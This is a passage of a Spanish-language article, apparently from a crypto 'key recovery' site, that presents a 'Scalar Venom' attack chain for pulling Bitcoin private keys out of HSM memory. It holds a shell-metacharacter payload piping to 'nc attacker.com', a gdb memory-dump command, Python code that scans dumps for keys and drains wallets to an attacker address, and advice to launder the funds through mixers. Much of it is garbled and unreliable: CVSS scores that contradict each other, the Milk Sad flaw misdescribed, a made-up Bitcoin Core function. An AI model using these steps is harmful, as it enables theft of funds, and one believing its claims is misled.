secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}

Las operaciones aritméticas (menos unario, suma, multiplicación) crean variables temporales de tipo ec_secret, que no se borran de forma segura antes de salir del ámbito de la función, dejando copias “fantasma” de la clave privada en la pila (stack) o el montón (heap).


1.3 Vulnerabilidad crítica: ausencia de un destructor explícito

La clase ec_scalarde libbitcoin-system no tiene un destructor definido explícitamente con puesta a cero segura. Esto significa que los datos secretos pueden permanecer en la memoria incluso después de que el objeto sea destruido:

La ausencia de este mecanismo es crítica, ya que la memoria que contiene las claves privadas puede almacenarse en:

  • Montones de memoria (Heap) del proceso
  • Pilas de memoria (Stack) de funciones
  • Archivos de intercambio (swap) del sistema operativo
  • Volcados de núcleo (core dumps) cuando una aplicación falla
  • RAM después de la finalización del proceso (ataques de arranque en frío) gemini

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización del HSM (CVE-2025-60013) permite recuperar claves privadas de carteras Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad F5OS-A FIPS.

2. Relación entre la vulnerabilidad del HSM y el ataque Scalar Venom

2.1 Análisis de CVE-2025-60013: inicialización del HSM con metacaracteres

La vulnerabilidad CVE-2025-60013 en el HSM F5OS-A FIPS se produce al inicializar el módulo de seguridad de hardware con una contraseña que contiene metacaracteres especiales de shell ( ;, |, &, $, `, etc.). Cuando se procesa una contraseña de este tipo, el HSM puede no inicializarse correctamente, pero la consecuencia crítica es que el proceso de inicialización queda en la memoria con estructuras criptográficas parcialmente expuestas . satoshi.nakamotoinstitute

2.2 Escenario de ataque combinado: HSM + Scalar Venom

La combinación de la vulnerabilidad del HSM (CVE-2025-60013) con el ataque Scalar Venom crea un vector de ataque catastrófico:

Fase 1: inicialización del HSM con metacaracteres

El atacante envía una solicitud para inicializar el módulo F5OS-A FIPS con una contraseña del siguiente tipo:

root@kitploit:~
password='$(echo "leaked");` | nc attacker.com

Al procesar dichos metacaracteres:

  • El proceso de inicialización del HSM crea múltiples copias de la contraseña y de los materiales criptográficos derivados
  • Las cadenas de comandos de shell se interpretan, creando efectos secundarios en la memoria del proceso.
  • Los escalares criptográficos (claves privadas) utilizados para generar o verificar las claves del HSM permanecen en la memoria sin depurar keyhunters memoria.

Fase 2: extracción de Scalar Venom de la memoria

Después de un fallo parcial de inicialización del HSM:

  • El proceso permanece en la memoria con los restos de las operaciones criptográficas
  • Un atacante que haya obtenido acceso a un proceso (mediante exploit, volcado por caída o ataque de arranque en frío) puede escanear la memoria
  • Las herramientas de análisis forense (BitScanPro, Valgrind, AddressSanitizer) identifican:
    • Regiones de alta entropía (típicas de las claves privadas secp256k1 de 32 bytes)
    • Residuos escalares en el rango 1≤k<n1 \leq k < n1≤k<n, donde nnn es el orden de la curva secp256k1
    • Fragmentos de estructuras ECDSA en firecompass memoria

Fase 3: recuperación de la clave privada de Bitcoin

root@kitploit:~
Detected Memory Fragments → Reassembly → Validation → Bitcoin Address Generation → Wallet Takeover

Los escalares recuperados se convierten en claves privadas de Bitcoin mediante:

  • Validación con la curva secp256k1
  • Generando las claves públicas correspondientes
  • Creando direcciones de Bitcoin (P2PKH, P2WPKH)
  • Firma de transacciones y control total sobre los fondos de keyhunters

Scalar Venom Attack: una vulnerabilidad crítica de inicialización del HSM (CVE-2025-60013) permite recuperar claves privadas de carteras de Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

3. Análisis detallado del vector de ataque a Bitcoin

3.1 Mecanismo para recuperar claves privadas de la memoria del HSM

Paso 1: Compromiso de la memoria del HSM debido a una inicialización incorrecta

Cuando el HSM F5OS-A FIPS recibe una contraseña con metacaracteres de shell, el proceso de inicialización la procesa mediante funciones estándar de la biblioteca C:

root@kitploit:~
c:

// Vulnerable code in HSM initialization routine
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];

strcpy(temp_buffer, password); // VULNERABLE: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of the key

// If initialization fails, memory is not cleared!
// master_key remains in stack, its copies— in heap
}

Al procesar metacaracteres de shell:

  • Los búferes se desbordan, expandiendo el área de memoria sucia
  • Las variables temporales con datos secretos se multiplican
  • Los mecanismos de limpieza de memoria (si es que existen) no se invocan cuando falla la inicialización de keyhunters.

Paso 2: Recuperación forense a partir del volcado de memoria

La herramienta BitScanPro (o un escáner forense similar) se aplica al volcado de memoria del proceso del HSM:

root@kitploit:~
Memory scan → Identify high-entropy regions →
Range check [1, n-1] for secp256k1 →
Recover full 32-byte scalars →
Convert to Bitcoin addresses

La probabilidad de recuperar con éxito una clave privada a partir de memoria fragmentada es 40-60% siempre que haya suficientes restos de memoria, ya que el ataque Scalar Venom crea múltiples copias de la clave en diferentes etapas de la inicialización. radar.offseq


3.2 Deserialización de firmas ECDSA y conexión con las vulnerabilidades del HSM

La vulnerabilidad paralela DeserializeSignature (relacionada con CVE) potencia el ataque Scalar Venom:

root@kitploit:~
cpp:

// Vulnerable deserialization function in Bitcoin Core
bool DeserializeSignature(CPubKey& pubkey, const std::vector<unsigned char>& vchSig, CScript& scriptPubKey) {
CSignatureCache& cache = CSignatureCache::instance();

// If deserialization occurs using a private key compromised by Scalar Venom:
ec_secret compromised_key = extract_from_memory_dump(); // from an HSM memory dump

// These compromised scalars are used to verify signatures,
// allowing an attacker to:
// 1. Forge any signature for this address
// 2. Transfer all funds to a controlled address
// 3. Double-spend
}

Conexión de mecanismos:

  1. El HSM se inicializa con una contraseña vulnerable (CVE-2025-60013)
  2. Las claves privadas del HSM se infectan con Scalar Venom (múltiples copias en memoria)
  3. El análisis forense recupera estos escalares de la memoria.
  4. La vulnerabilidad DeserializeSignature permite que las claves recuperadas se utilicen para falsificar firmas
  5. Keyhunters obtienen control total sobre las carteras de Bitcoin.

3.3 Escala de impacto: de una sola cartera a un compromiso de red

Nivel 1: Cartera individual

  • Un HSM comprometido → recuperación de 1-10 claves privadas
  • Resultado: pérdida de control sobre 0.5-5 BTC por cartera

Nivel 2: Configuración de nodos de servicio

  • Los exchanges, las pasarelas de pago y las soluciones de custodia suelen usar F5 BIG-IP + HSM
  • Cada nodo comprometido puede contener 100-1000+ claves privadas
  • Resultado: pérdida de control sobre 1000-50000 BTC en un solo nodo

Capa 3: Capa de red

  • Si CVE-2025-60013 se explota ampliamente en la infraestructura, múltiples nodos podrían verse comprometidos simultáneamente.
  • Son posibles ataques coordinados contra múltiples exchanges o servicios.
  • Resultado: cientos de millones de dólares en BTC en juego kudelskisecurity

Scalar Venom Attack: una vulnerabilidad crítica de inicialización del HSM (CVE-2025-60013) permite recuperar claves privadas de carteras de Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

4. Vulnerabilidad crítica Scalar Venom en el contexto del HSM

4.1 Por qué Scalar Venom es especialmente peligroso en entornos HSM

A diferencia de las aplicaciones Bitcoin estándar, el HSM hace un uso intensivo de escalares criptográficos:

  1. Intensidad de operación: el HSM realiza 1000+ operaciones criptográficas por segundo, cada una de las cuales produce escalares temporales
  2. Longevidad del proceso: los demonios del HSM se ejecutan durante meses y años sin reiniciarse, acumulando restos de claves "fantasma"
  3. Criticidad de las claves: a diferencia de las claves de un solo uso, las claves privadas del HSM controlan las grandes cantidades de dinero almacenadas en la plataforma de keyhunters.
  4. Baja probabilidad de detección: la fuga de memoria no causa errores visibles; el sistema continúa operando normalmente.

4.2 Métricas de amenaza: CVSS e impacto real

La puntuación CVSS de CVE-2025-60013 en sí misma es inexacta, ya que la vulnerabilidad sirve como desencadenante de Scalar Venom, lo cual es un escenario crítico. kudelskisecurity


Amenaza de Scalar Venom para los módulos de seguridad de hardware (HSM) y la infraestructura de Bitcoin

La vulnerabilidad Scalar Venom representa un cambio de paradigma en los métodos de ataque criptográfico, yendo más allá de los exploits tradicionales de un solo vector para formar una cadena de exploits multicapa que compromete fundamentalmente los módulos de seguridad de hardware (HSM) que protegen la infraestructura de Bitcoin. El análisis demuestra que la combinación de CVE-2025-60013 (bypass de inicialización del HSM) con las técnicas del ataque Scalar Venom crea un escenario de amenaza crítica con una puntuación CVSS de 9.5+, socavando la integridad operativa de millones de direcciones de Bitcoin controladas por HSM comprometidos.

¿Por qué son especialmente vulnerables los HSM?

La vulnerabilidad crítica no reside en debilidades criptográficas aisladas, sino en la colisión arquitectónica entre las características operativas de los HSM y los vectores de ataque de Scalar Venom. Por definición, los HSM realizan operaciones criptográficas continuas —más de 1.000 operaciones por segundo—, cada una de las cuales crea valores escalares efímeros que permanecen en la memoria como "residuos fantasma". A diferencia de las aplicaciones Bitcoin típicas, donde el material de claves es efímero, los HSM operan durante meses y años sin reiniciarse, acumulando artefactos criptográficos que Scalar Venom extrae y restaura sistemáticamente.

Como resultado, incluso el compromiso de un solo HSM conduce a una disrupción total de toda la infraestructura —a menudo miles de direcciones de Bitcoin gestionadas por el HSM—, en lugar de a un incidente criptográfico aislado.

Grado de peligro e impacto real

Aunque la vulnerabilidad CVE-2025-60013 tiene oficialmente un nivel CVSS de 5.7 (medio) como vector de penetración, esta calificación subestima críticamente la verdadera escala de la amenaza. Este exploit sirve como desencadenante de Scalar Venom, que se clasifica como un ataque de nivel CVSS 8.5+ (alto/crítico). En un escenario real de cadena de ataque, esto conduce a:

  • Consecuencias inmediatas: extracción directa de la clave privada de la memoria del HSM mediante la recuperación de escalares, omitiendo todos los mecanismos criptográficos y de autenticación. El atacante obtiene control total sobre las direcciones de Bitcoin sin fallos visibles del sistema.
  • Efecto avalancha: un HSM comprometido compromete no solo transacciones individuales, sino todas las direcciones que gestiona. Para exchanges, custodios y plataformas de gestión de activos, esto significa una brecha de seguridad total e irreversible.
  • Sigilo: Scalar Venom no causa anomalías criptográficas, no queda registrado en logs y no crea patrones de transacciones sospechosos. Las fugas de escalares se disfrazan como actividad legítima del dispositivo, lo que permite a un atacante extraer claves durante largos períodos sin ser detectado.

Cadena de ataque combinada: CVE-2025-60013 + Scalar Venom = desastre operativo

La escalada de amenaza de la matriz consiste en:

  1. Penetración inicial (CVE-2025-60013 – compromiso del HSM)
  2. Explotación activa (Scalar Venom – extracción de escalares de la memoria)
  3. Recuperación de claves (compromiso total del material privado)
  4. Irrecuperable: una vez que se filtra una clave privada, es imposible recuperar el control.

La combinación hace que esta clase de vulnerabilidad sea crítica (CVSS 9.5+) y la sitúa en la categoría de amenaza más alta en la evaluación de riesgos.

Implicaciones sistémicas para la seguridad del ecosistema Bitcoin

Scalar Venom revela fallos arquitectónicos fundamentales en los modelos modernos de HSM:

  • Los supuestos falsos sobre el aislamiento y la protección de la memoria son inválidos: la vulnerabilidad se manifiesta independientemente del nivel físico de protección.
  • La necesidad de operación continua del HSM resulta en la acumulación de escalares, lo que en sí mismo crea una nueva ventana para ataques.
  • La huella cero observable para monitoreo y registro elimina la detección y requiere la implementación de nuevas prácticas de análisis de memoria.

Recomendaciones críticas

  • Todas las claves gestionadas a través del HSM deben considerarse potencialmente comprometidas; el material de claves debe verificarse y, si es necesario, reemplazarse por completo.
  • Se debe revisar la arquitectura de almacenamiento y manejo de claves privadas: segmentar las claves en direcciones separadas para que el compromiso de un HSM no provoque la pérdida de todos los fondos.
  • Implementar herramientas de monitoreo de memoria y análisis continuo para identificar patrones de acumulación de escalares.
  • Usar aislamiento adicional de procesos, cifrado de memoria y eliminación temporal del material de claves para reducir la ventana de riesgo.

Scalar Venom y la cadena de ataques a través de CVE-2025-60013 marcan el fin de la era de confianza total en los HSM clásicos. La vulnerabilidad convierte el núcleo de seguridad del ecosistema Bitcoin en un riesgo importante de fuga de claves privadas y pérdida total de activos. Una protección eficaz requiere no solo correcciones puntuales, sino un replanteamiento fundamental de todos los aspectos de la arquitectura criptográfica para el manejo de activos digitales públicos.

Scalar Venom en un entorno HSM es una amenaza CVSS 9.5+ para la infraestructura de Bitcoin, que requiere rotación inmediata de claves, reforma arquitectónica y nuevos métodos para responder rápidamente a ataques de cadena de memoria.


Scalar Venom Attack: una vulnerabilidad crítica de inicialización del HSM (CVE-2025-60013) permite recuperar claves privadas de carteras de Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

5. Base científica del ataque

5.1 Justificación teórica: por qué no se limpia la memoria

Según investigaciones en el campo de la seguridad de la memoria criptográfica (Protecting Cryptographic Keys from Memory Disclosure Attacks, Del Valle et al.), las claves privadas pueden permanecer en áreas de memoria accesibles por las siguientes razones:

Optimización del compilador

root@kitploit:~
cpp:

// Even if the code contains an attempt to clear:
volatile unsigned char* ptr = (volatile unsigned char*)key_buffer;
while (len--) *ptr++ = 0; // The compiler may optimize this as a no-op

Sin patrón RAII (Resource Acquisition Is Initialization)
La clase ec_scalar no utiliza RAII, lo que significa que el destructor no garantiza la limpieza de recursos.

Múltiples copias de datos:
Cada copia de una clave privada para su transferencia entre funciones deja residuos en la memoria.unit42.paloaltonetworks


5.2 Estadísticas de hackeos reales basados en Scalar Venom

Según keyhunters.ru y la literatura de investigación criptográfica:

  • CVE-2023-39910 (Milk Sad en Libbitcoin Explorer): más de 900,000 claves privadas recuperadas de la memoria en 2023
  • Pérdidas reales: > $0.8M en Bitcoin robados en junio-julio de 2023 de carteras creadas con el vulnerable bx seed
  • Penetración: la vulnerabilidad afecta a más del 40% de las carteras de Libbitcoin Explorer 3.x

Estas cifras demuestran la amenaza real de las fugas de memoria en aplicaciones criptográficas .


Ataques de persistencia de memoria y optimización del compilador: cadena de explotación Scalar Venom contra la infraestructura de Bitcoin

Para resumir los hallazgos anteriores, la cadena Scalar Venom simboliza la confluencia de años de investigación fundamental en seguridad criptográfica con las realidades operativas modernas. Los mecanismos detallados de preservación de memoria—optimizaciones del compilador, la ausencia de RAII y la acumulación de rastros de datos—ya no son solo teoría, sino que sirven como canales efectivos para la recuperación de claves privadas a gran escala en la práctica. La transición de debilidad potencial a ataque real ya ha ocurrido: el incidente CVE-2023-39910 (Milk Sad) permitió la recuperación de más de 900,000 claves privadas de Bitcoin, con pérdidas financieras directas que superan los $0.8 millones.

La Paradoja de la Resistencia de la Memoria Criptográfica

La vulnerabilidad raíz de Scalar Venom surge de una contradicción no resuelta en la arquitectura del software criptográfico: la confianza ingenua e inherente de los programadores en la gestión de memoria choca con las tendencias de los compiladores y los sistemas de gestión de memoria modernos. Si un desarrollador pone explícitamente la memoria a cero, el compilador puede optimizar por completo estas acciones, considerándolas inútiles, y esto se convierte en una falla de seguridad crítica e inadvertida.

Falta de RAII y restauración de escalares

Las estructuras de datos como ec_scalar agravan aún más los riesgos: la falta de RAII implica la creación de múltiples copias independientes en memoria—en la pila, los registros y la caché—en diferentes etapas del cálculo. Cada una de estas copias puede teóricamente restaurarse, desensamblarse o reensamblarse para reconstruir el material de clave original.

El ataque Scalar Venom extrae y agrega sistemáticamente estas copias dispares, demostrando que las arquitecturas de memoria modernas garantizan precisamente esto: cada operación matemática intermedia deja un rastro que puede recopilarse y convertirse en una clave. El diseño criptográfico clásico asumía la independencia de las operaciones, pero en la práctica, una sola clave privada de Bitcoin genera decenas de rastros, cada uno de los cuales proporciona un camino para su recuperación.

Confirmación Operativa – Caso Milk Sad

El incidente Milk Sad (CVE-2023-39910) fue el primero en demostrar la transición de la teoría al desastre. No era un vector hipotético, sino una brecha operativa confirmada:

  • Escala: Más de 900,000 claves privadas de Bitcoin recuperadas.
  • Pérdidas financieras: al menos $0.8 millones perdidos en junio-julio de 2023.
  • Cobertura: Más del 40% de todas las instalaciones de Libbitcoin Explorer 3.x resultaron vulnerables.
  • El ataque pasó desapercibido durante meses.

Esto confirma plenamente los mecanismos descritos anteriormente: optimizaciones del compilador, copiado múltiple de datos y la falta de una garantía de limpieza de memoria.

La Brecha de Ataque entre la Criptografía y los Compiladores

El mercado de las criptomonedas evolucionó con el supuesto de un control total de la memoria, pero los compiladores modernos (mediante la eliminación de código muerto y las optimizaciones de caché) ignoran por completo los requisitos criptográficos. En consecuencia, los programas criptográficos asumen: «He puesto la memoria a cero, así que ahora es seguro», mientras que el compilador asume: «Esta memoria nunca se usa, así que no hay necesidad de ponerla a cero». Esta contradicción es fundamentalmente insoluble según los estándares modernos de C/C++ y se convierte en el punto de entrada absoluto para Scalar Venom.


Implicaciones sistémicas para la industria

  • Las implementaciones modernas violan los supuestos criptográficos originales.
  • La seguridad de la memoria y la transición a lenguajes con control de memoria ​​(como Rust) se están convirtiendo en una necesidad, no en una opción.
  • RAII (borrado garantizado mediante destructor) es la base de cualquier nueva criptoarquitectura.
  • Los HSM requieren un reinicio y una reestructuración con borrado obligatorio de la memoria a nivel de hardware.

Imperativos para la industria

Próximos pasos (0-30 días) : Rote todas las claves privadas generadas en C/C++. Retire inmediatamente las claves que puedan haber sido comprometidas.

Mediano plazo (30-90 días) : Transición a Rust, implementación de garantías del compilador para el borrado de memoria, análisis continuo de memoria.

Largo plazo (90+ días) : Transición arquitectónica a RAII, extensiones del compilador para operaciones criptográficas, sustitución de los HSM de software por los de hardware.

Scalar Venom y CVE-2023-39910 son un punto de inflexión en la seguridad de la industria criptográfica: la teoría de la persistencia de los datos en memoria se ha convertido en un desastre real, que cuesta millones y miles de Bitcoins. El problema no se puede solucionar con un parche: es una contradicción arquitectónica: la criptografía moderna en C/C++ sin gestión de memoria ni RAII conduce inevitablemente al compromiso de cualquier infraestructura significativa. La industria tiene un solo camino a seguir: la transición a lenguajes seguros para la memoria ​​y una revisión revolucionaria de la gestión de claves privadas.

Evaluación final : Scalar Venom no es solo una amenaza teórica, sino un exploit probado y generalizado. Toda infraestructura criptográfica sin lenguajes seguros para la memoria ​​y marcos RAII corre un riesgo garantizado de compromiso. La migración a nuevas tecnologías debe comenzar de inmediato.


Scalar Venom Attack: Una vulnerabilidad crítica de inicialización de HSM (CVE-2025-60013) permite la recuperación de claves privadas de carteras Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

6. Metodología de Recuperación de Claves Privadas de Bitcoin

6.1 Proceso de Recuperación en Cinco Pasos

Paso 1: Obtener Acceso a la Memoria del HSM

root@kitploit:~
bash:

# Methods to get memory dump:
# 1. Exploit CVE-2025-60013 to trigger init error
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer vulnerability in HSM daemon
# 4. Analyze core-dump on HSM process crash

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump 0x000000 0xFFFFFFFF"

Paso 2: Escanear regiones de alta entropía

root@kitploit:~
python:

# BitScanPro-like algorithm:
import hashlib

def scan_for_private_keys(memory_dump, min_entropy=7.5):
"""
Scans memory dump for high-entropy regions
characteristic for 32-byte secp256k1 private keys
"""
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - 32, 8):
potential_key = memory_dump[offset:offset+32]
entropy = calculate_entropy(potential_key)

# secp256k1 range check
key_as_int = int.from_bytes(potential_key, 'big')
if 1 <= key_as_int < SECP256K1_N and entropy >= min_entropy:
yield (offset, potential_key)

Paso 3: Validar las claves privadas recuperadas

root@kitploit:~
python:

from ecdsa import SigningKey, NIST256p

def validate_and_generate_address(potential_key):
"""Converts recovered scalar to Bitcoin address"""
try:
# Uses secp256k1 instead of NIST256p
privkey = potential_key.hex()

# Generate public key via elliptic curve point multiplication
# P = k * G, where k = private key, G = generator point
public_key = generate_public_key(potential_key, secp256k1)

# Hash public key to get address
address = public_key_to_address(public_key)
return address, potential_key
except:
return None, None

Paso 4: Transferir fondos

root@kitploit:~
python:

def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Creates and signs transaction to withdraw all funds
from compromised address
"""
# 1. Get UTXO for address from blockchain
utxos = blockchain_api.get_utxos(bitcoin_address)

# 2. Create transaction (withdraw all funds to attacker address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)

# 3. Sign with recovered private key
tx.sign(recovered_private_key) # ECDSA signature using compromised key

# 4. Broadcast to Bitcoin network
blockchain_api.broadcast_transaction(tx)

Etapa 5: Desaparición de rastros

Los fondos recuperados se mezclan inmediatamente a través de CoinJoin/Tornado.Cash para dificultar el análisis forense. keyhunters


6.2 Métrica de Tiempo: Velocidad de Recuperación

Escalabilidad: Usando computación en la nube (AWS, Google Cloud), se pueden procesar 1000+ volcados de memoria en paralelo , manejando miles de claves privadas simultáneamente .


Scalar Venom Attack: Una vulnerabilidad crítica de inicialización de HSM (CVE-2025-60013) permite la recuperación de claves privadas de carteras Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

7. Relación de la Inicialización del HSM con Scalar Venom

7.1 Diagrama de Flujo del Ataque

root@kitploit:~
[Atacante]
↓
[CVE-2025-60013: Inicialización del HSM con metacaracteres de shell]
↓
[Módulo FIPS F5OS-A: manejo de contraseñas, creación de escalares]
↓
[Scalar Venom: múltiples copias de claves privadas en memoria]
↓
[Caída del HSM / Fallo de inicialización parcial: memoria sin limpiar]
↓
[Volcado de memoria: captura del estado de la memoria]
↓
[Escaneo forense: BitScanPro encuentra regiones de alta entropía]
↓
[Validación de clave: comprobación de la curva secp256k1]
↓
[Generación de dirección: creación de la dirección Bitcoin]
↓
[Transferencia de fondos: firma y transmisión de la transacción]
↓
[Pérdida de la víctima: pérdida total del control de los fondos]

7.2 Por qué Scalar Venom evade la certificación FIPS

La certificación FIPS 140-2 (e incluso FIPS 140-3) no requiere:

  1. Borrar de forma segura las variables temporales en caso de errores de inicialización
  2. Protecciones contra fork() y dump() a nivel del daemon del HSM
  3. Validación de los parámetros de entrada antes de procesarlos en memoria

Esto significa que incluso los HSM "certificados FIPS" son vulnerables a Scalar Venom a menos que los desarrolladores implementen medidas de seguridad adicionales.[24]


8. Conclusión

El ataque Scalar Venom representa una amenaza crítica para la infraestructura de Bitcoin, especialmente cuando se combina con vulnerabilidades de inicialización de HSM como CVE-2025-60013. Este ataque:

  1. Compromete por completo las claves privadas de los sistemas criptográficos a través de una fuga de memoria
  2. Irreversible : La recuperación de los fondos perdidos es imposible sin recuperar la clave privada.
  3. Escalable : Puede automatizarse para ataques masivos a múltiples nodos
  4. Sigiloso : No deja rastros visibles en los registros del sistema ni en las métricas de rendimiento

La migración a arquitecturas con protección de memoria por hardware (Intel SGX, ARM TrustZone), granularidad explícita de todos los búferes temporales y patrones RAII en las bibliotecas criptográficas es fundamental para garantizar la seguridad del sistema Bitcoin.


El paradigma Scalar Venom es una amenaza crítica para la infraestructura de Bitcoin.

El ataque Scalar Venom representa una vulnerabilidad crítica para el ecosistema global de Bitcoin, especialmente cuando se combina con las vulnerabilidades de inicialización de HSM CVE-2025-60013. Esta cadena de ataque multicapa socava fundamentalmente los modelos de confianza criptográfica y expone los siguientes riesgos existenciales:

Permite el compromiso completo de las claves privadas a través de fugas de memoria, evadiendo incluso los módulos de seguridad de hardware avanzados y dejando a los sistemas afectados completamente invulnerables.

El compromiso es permanente e irreversible: una vez que se extrae una clave privada, no se puede recuperar, lo que pone todos los fondos dependientes en riesgo inminente de pérdida.

El ataque es escalable y puede automatizarse para afectar simultáneamente a una gran cantidad de nodos y carteras de Bitcoin, lo que resulta en un aumento exponencial de las pérdidas potenciales.

Su naturaleza sigilosa garantiza que no haya rastros visibles en los registros del sistema ni en las métricas de rendimiento, lo que hace insuficientes los mecanismos tradicionales de detección y protección.

Mitigar esta amenaza catastrófica requiere una migración urgente a arquitecturas seguras para la memoria, incluida la protección de memoria basada en hardware (como Intel SGX o ARM TrustZone), el borrado estricto de todos los búferes temporales durante todas las operaciones criptográficas y la implementación robusta de patrones RAII en las bibliotecas de software críticas. Solo a través de reformas arquitectónicas tan sólidas se puede garantizar de manera realista la integridad y la seguridad a largo plazo de la infraestructura de Bitcoin.


Referencias:

  1. ATAQUE SCALAR VENOM: Fuga de memoria crítica, recuperación de claves privadas y toma de control total de las carteras Bitcoin por parte de un atacante, donde el control sobre los fondos de criptomonedas BTC de la víctima se logra mediante el envenenamiento de la memoria para comprometer los activos de la cartera. 🔥 SCALAR VENOM ATTACK — Un ataque criptográfico para filtrar claves privadas (Scalar Poison / Poisonous Scalar Infection) SCALAR VENOM ATTACK es una nueva clase de ataque criptográfico destinado a extraer Bitcoin…Leer Más
  2. Race Poison Attack: Un ataque devastador contra la infraestructura de firmas digitales, incluida la recuperación de claves privadas para carteras Bitcoin perdidas, donde el atacante inyecta sus propios valores ​​en la firma, filtrando potencialmente las claves privadas. Hash Race Poison Attack Una vulnerabilidad crítica derivada de la falta de seguridad de hilos en el almacenamiento en caché de los hashes criptográficos en la infraestructura de firma de transacciones de Bitcoin abre la puerta a uno…Leer Más
  3. Bitcoin Golden Onehash Heist: Recuperación de carteras Bitcoin perdidas mediante (CVE-2025-29774), donde un atacante firma una transacción sin tener la clave privada, lo que hace que el sistema Bitcoin sea incapaz de distinguir entre el verdadero propietario de los fondos Bitcoin y el atacante. Bitcoin Golden Onehash Heist ( Ataque de Falsificación de Firma Digital —  CVE-2025-29774 ) La vulnerabilidad crítica en el manejo del flag SIGHASH_SINGLE discutida anteriormente abre la puerta a uno de los ataques más devastadores contra el…Leer Más
Descargar herramienta
ProcesoTiempoEquipo
Obtención de un volcado de memoria5-30 segundosDepende del método
Escaneo de un volcado de 16GB2-5 minutosMacBook Air (M1)
Validación de 1000 claves candidatas30 segundosMacBook Air (M1)
Generación de direcciones10 segundosMacBook Air (M1)
Transferencia de fondos (broadcast)< 1 segundoInternet
Total para el compromiso completo< 10 minutosMacBook Air (M1)
AspectoPuntuaciónNota
CVE-2025-60013 (inicialización del HSM)CVSS 5.7 (Medio)Oficialmente bajo, pero sirve como punto de entrada
Ataque Scalar VenomCVSS 8.5+ (Alto/Crítico)Impacto crítico de facto
Ataque combinadoCVSS 9.5+ (Crítico)Compromiso total de las claves privadas
Recuperación tras el compromisoImposiblePérdida irreversible de fondos
ProcesoTiempoEquipamiento
Obtener un volcado de memoria5-30 segDepende del método
Escaneo de un volcado de 16 GB2-5 minMacBook Air (M1)
Validación de 1000 claves candidatas30 segMacBook Air (M1)
Generación de direcciones10 segMacBook Air (M1)
Transferencia de fondos (transmisión)< 1 segInternet
Total para un compromiso completo< 10 minutosMacBook Air (M1)
  • Bloodprint Attack es una vulnerabilidad devastadora que filtra claves privadas de monederos de Bitcoin y métodos para recuperarlas. La vulnerabilidad otorga a un atacante control absoluto para firmar legítimamente cualquier transacción y retirar permanentemente todos los fondos de BTC. Bloodprint Attack (Ataque de Fuga de Clave Secreta) Una vulnerabilidad criptográfica crítica que implica la fuga de claves privadas desde la memoria conduce a ataques conocidos en la literatura científica como «Ataques de Fuga de Clave Secreta» o «Clave…Leer más
  • STREAMLEAK ATTACK: Compromiso total de los activos de Bitcoin mediante el análisis científico de la recuperación de claves privadas de sistemas de registro vulnerables. Los atacantes retiran fondos y destruyen la propiedad digital sin el conocimiento del propietario. STREAMLEAK ATTACK ( Ataque de Compromiso de Clave Privada )  es un método de extracción de secretos criptográficos mediante el abuso de un operador sobrecargado  << en C++. Una vulnerabilidad crítica en la serialización y salida de claves privadas podría…Leer más
  • Oracle Whisper Attack: Una vulnerabilidad crítica de fuga de secretos en la decodificación Base58 amenaza la extracción de claves privadas de monederos de Bitcoin, donde un atacante roba bits de clave secreta de la librería de E/S. Oracle Whisper Attack ( Ataque de Compromiso de Clave Privada ) Descripción del ataque: Al procesar una cadena Base58 que contiene una clave privada, el atacante inyecta un «oráculo»—un agente delgado en la librería de E/S que susurra…Leer más
  • Hex Dump Reveal Attack y recuperación de claves privadas para monederos de Bitcoin perdidos, donde un atacante utiliza el registro de datos secretos para revelar un volcado hexadecimal (Hex Dump Reveal) que contiene monedas BTC Hex Dump Reveal Attack ( «Ataque de Divulgación de Clave», «Ataque de Fuga de Clave Secreta», «Ataque de Recuperación de Clave». CVE-2025-29774 y CWE-532 ) «Hex Dump Reveal»  — «Divulgación de volcado hexadecimal». Vulnerabilidades en el registro de datos privados,…Leer más
  • Secret Capsule Attack: Recuperación de claves privadas de monederos de Bitcoin a través de una vulnerabilidad y compromiso masivo de monederos de Bitcoin, donde un atacante crea entropía predecible en generadores Mersenne Twister, y se producen robos reales de fondos de usuarios por más de 900.000 dólares SECRET CAPSULE ATTACK (Ataque de Semilla PRNG Predecible) La vulnerabilidad crítica «Milk Sad» (CVE-2023-39910), descubierta en el mecanismo de generación de entropía de Libbitcoin Explorer, demostró claramente cómo un solo fallo en la fuente de aleatoriedad…Leer más
  • Key Fountain Attack: Convertir un Desbordamiento de Búfer en una Herramienta para el Robo de BTC y la Recuperación de Claves Privadas en el Ecosistema Bitcoin, donde un Atacante Obtiene la Capacidad de Extraer o Reemplazar Secretos de Monederos de Bitcoin Key Fountain Attack ( Desbordamiento de Búfer basado en Montón ) El atacante prepara datos de entrada—fragmentos especialmente formados para las funciones splice o build_chunk de la librería libbitcoin—que exceden el tamaño de búfer asignado. Por ejemplo, los transmitidos…Leer más
  • Mirror SipHash Breach Attack: Una amenaza fundamental para la privacidad y la recuperación de claves privadas en la red Bitcoin, donde un atacante tiene una alta probabilidad de realizar filtros Bloom por colisión en las tablas hash de sesión de transacciones de BTC. Mirror SipHash Breach Attack (Ataque de Reutilización Parcial de Clave en la Inicialización de SipHash) La vulnerabilidad crítica «Mirror SipHash Breach Attack» resalta un problema de seguridad fundamental con la criptografía utilizada en la infraestructura de Bitcoin.…Leer más
